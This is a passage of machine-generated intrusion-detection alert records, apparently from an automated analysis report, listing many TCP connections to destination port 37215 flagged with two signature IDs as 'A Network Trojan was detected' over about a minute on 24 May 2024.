              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164533
              SID:2835222
              Source Port:51264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885875
              SID:2835222
              Source Port:50696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458321
              SID:2835222
              Source Port:56612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819576
              SID:2835222
              Source Port:33424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061584
              SID:2829579
              Source Port:56444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313568
              SID:2829579
              Source Port:59300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536788
              SID:2829579
              Source Port:54074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151020
              SID:2835222
              Source Port:44864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391610
              SID:2829579
              Source Port:56240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485723
              SID:2829579
              Source Port:40574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452833
              SID:2829579
              Source Port:35466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624451
              SID:2835222
              Source Port:34670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433463
              SID:2835222
              Source Port:52860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165633
              SID:2835222
              Source Port:36320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365262
              SID:2835222
              Source Port:60210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.410922
              SID:2829579
              Source Port:59868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725291
              SID:2835222
              Source Port:42916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396326
              SID:2835222
              Source Port:56390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477848
              SID:2829579
              Source Port:49188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727901
              SID:2835222
              Source Port:44106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872015
              SID:2829579
              Source Port:39558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693255
              SID:2829579
              Source Port:35488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400363
              SID:2829579
              Source Port:40140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334141
              SID:2829579
              Source Port:40930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505676
              SID:2829579
              Source Port:52750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157066
              SID:2835222
              Source Port:39498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483787
              SID:2835222
              Source Port:36084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456308
              SID:2835222
              Source Port:53450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234463
              SID:2829579
              Source Port:33404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073317
              SID:2829579
              Source Port:41130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406366
              SID:2829579
              Source Port:51626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574677
              SID:2835222
              Source Port:42108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991145
              SID:2835222
              Source Port:43924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426473
              SID:2835222
              Source Port:53478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483447
              SID:2835222
              Source Port:56610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639882
              SID:2829579
              Source Port:35810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375051
              SID:2835222
              Source Port:39882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495434
              SID:2829579
              Source Port:51512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300018
              SID:2829579
              Source Port:56026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485043
              SID:2835222
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.537822
              SID:2829579
              Source Port:59330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640959
              SID:2829579
              Source Port:56984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624759
              SID:2835222
              Source Port:45632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250820
              SID:2829579
              Source Port:59846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123460
              SID:2829579
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313272
              SID:2835222
              Source Port:52772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535865
              SID:2835222
              Source Port:36104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726065
              SID:2829579
              Source Port:59460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638865
              SID:2829579
              Source Port:41996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967733
              SID:2829579
              Source Port:56014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.266365
              SID:2829579
              Source Port:58762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923881
              SID:2829579
              Source Port:47996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365278
              SID:2835222
              Source Port:41520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375018
              SID:2835222
              Source Port:39914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245234
              SID:2829579
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394869
              SID:2829579
              Source Port:57392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575748
              SID:2829579
              Source Port:53320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067978
              SID:2835222
              Source Port:48918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.080906
              SID:2835222
              Source Port:56462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057398
              SID:2829579
              Source Port:49296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161676
              SID:2835222
              Source Port:37448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801589
              SID:2835222
              Source Port:37902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378052
              SID:2829579
              Source Port:39436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726090
              SID:2829579
              Source Port:43454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856909
              SID:2835222
              Source Port:51418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420923
              SID:2829579
              Source Port:34814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491499
              SID:2835222
              Source Port:55426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420382
              SID:2829579
              Source Port:38266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118276
              SID:2829579
              Source Port:34072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926427
              SID:2829579
              Source Port:50038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363267
              SID:2835222
              Source Port:46422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.418963
              SID:2835222
              Source Port:45212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572433
              SID:2829579
              Source Port:43344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802316
              SID:2829579
              Source Port:44758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063180
              SID:2835222
              Source Port:45644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868004
              SID:2829579
              Source Port:60830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664425
              SID:2829579
              Source Port:42714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.380321
              SID:2835222
              Source Port:44544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878194
              SID:2835222
              Source Port:38984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187577
              SID:2835222
              Source Port:45250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290183
              SID:2829579
              Source Port:36980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698589
              SID:2835222
              Source Port:42880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348065
              SID:2835222
              Source Port:47666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202486
              SID:2829579
              Source Port:55640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341138
              SID:2829579
              Source Port:57044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857492
              SID:2829579
              Source Port:42296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633077
              SID:2829579
              Source Port:33084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117284
              SID:2835222
              Source Port:53604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502350
              SID:2829579
              Source Port:53078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186603
              SID:2829579
              Source Port:45906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245557
              SID:2835222
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235569
              SID:2829579
              Source Port:42854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188877
              SID:2835222
              Source Port:45268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989967
              SID:2829579
              Source Port:40238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575211
              SID:2829579
              Source Port:53214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303266
              SID:2835222
              Source Port:45988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604685
              SID:2835222
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186598
              SID:2829579
              Source Port:54128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553326
              SID:2829579
              Source Port:60238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160479
              SID:2835222
              Source Port:42076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070093
              SID:2829579
              Source Port:40690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369042
              SID:2829579
              Source Port:43444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462937
              SID:2835222
              Source Port:43028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099798
              SID:2829579
              Source Port:50058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982420
              SID:2835222
              Source Port:43748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055508
              SID:2835222
              Source Port:41948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638008
              SID:2829579
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390609
              SID:2829579
              Source Port:51636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284737
              SID:2835222
              Source Port:34822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100556
              SID:2829579
              Source Port:60846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568191
              SID:2835222
              Source Port:55584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254257
              SID:2829579
              Source Port:35230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165211
              SID:2829579
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516609
              SID:2829579
              Source Port:55208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281009
              SID:2829579
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586497
              SID:2829579
              Source Port:44796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118736
              SID:2829579
              Source Port:58538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544126
              SID:2829579
              Source Port:52658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517343
              SID:2835222
              Source Port:40908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111818
              SID:2835222
              Source Port:47288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253993
              SID:2829579
              Source Port:33364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112651
              SID:2829579
              Source Port:40294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623590
              SID:2835222
              Source Port:35454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242017
              SID:2835222
              Source Port:56274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823767
              SID:2829579
              Source Port:42252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394373
              SID:2835222
              Source Port:54812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103191
              SID:2829579
              Source Port:48352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924344
              SID:2829579
              Source Port:43598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313655
              SID:2835222
              Source Port:58494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369035
              SID:2829579
              Source Port:36090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455945
              SID:2829579
              Source Port:45152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060695
              SID:2835222
              Source Port:55712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313522
              SID:2835222
              Source Port:53244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763209
              SID:2835222
              Source Port:43086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055559
              SID:2829579
              Source Port:60414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431553
              SID:2835222
              Source Port:56264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726398
              SID:2835222
              Source Port:48054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801585
              SID:2829579
              Source Port:43492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152624
              SID:2829579
              Source Port:32960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543864
              SID:2829579
              Source Port:57328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493036
              SID:2835222
              Source Port:52528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044386
              SID:2835222
              Source Port:60656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162333
              SID:2835222
              Source Port:51930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459925
              SID:2835222
              Source Port:49296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606323
              SID:2835222
              Source Port:33490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873894
              SID:2835222
              Source Port:45198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.482976
              SID:2829579
              Source Port:57772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157705
              SID:2829579
              Source Port:52736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369020
              SID:2835222
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638264
              SID:2829579
              Source Port:51540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409149
              SID:2829579
              Source Port:54212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624133
              SID:2829579
              Source Port:34646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055309
              SID:2835222
              Source Port:43518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503382
              SID:2829579
              Source Port:53986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.824508
              SID:2829579
              Source Port:54328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884688
              SID:2829579
              Source Port:48228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457796
              SID:2835222
              Source Port:36346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429693
              SID:2835222
              Source Port:42584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548551
              SID:2835222
              Source Port:37106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053112
              SID:2829579
              Source Port:51672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397408
              SID:2829579
              Source Port:42050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992062
              SID:2829579
              Source Port:47970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129784
              SID:2829579
              Source Port:47018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078172
              SID:2829579
              Source Port:48310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802539
              SID:2829579
              Source Port:51560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641562
              SID:2829579
              Source Port:46750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924106
              SID:2829579
              Source Port:50184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374565
              SID:2835222
              Source Port:45828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394086
              SID:2829579
              Source Port:46870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099747
              SID:2835222
              Source Port:54024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118972
              SID:2835222
              Source Port:54242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402862
              SID:2835222
              Source Port:52938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861937
              SID:2829579
              Source Port:44240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300063
              SID:2829579
              Source Port:43454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153053
              SID:2835222
              Source Port:58326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165613
              SID:2835222
              Source Port:42894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.585668
              SID:2829579
              Source Port:33946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450166
              SID:2835222
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879251
              SID:2835222
              Source Port:41328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589263
              SID:2829579
              Source Port:37274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504560
              SID:2829579
              Source Port:57572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157074
              SID:2835222
              Source Port:44848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188375
              SID:2829579
              Source Port:45350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836217
              SID:2835222
              Source Port:39722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989734
              SID:2829579
              Source Port:37302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186977
              SID:2829579
              Source Port:38238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404480
              SID:2835222
              Source Port:56390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283379
              SID:2835222
              Source Port:44408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430110
              SID:2835222
              Source Port:51468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548481
              SID:2829579
              Source Port:48522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459512
              SID:2835222
              Source Port:49312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530698
              SID:2835222
              Source Port:37688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570634
              SID:2835222
              Source Port:33736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343541
              SID:2829579
              Source Port:56478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.643012
              SID:2835222
              Source Port:52088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600056
              SID:2835222
              Source Port:45512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163432
              SID:2829579
              Source Port:48300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
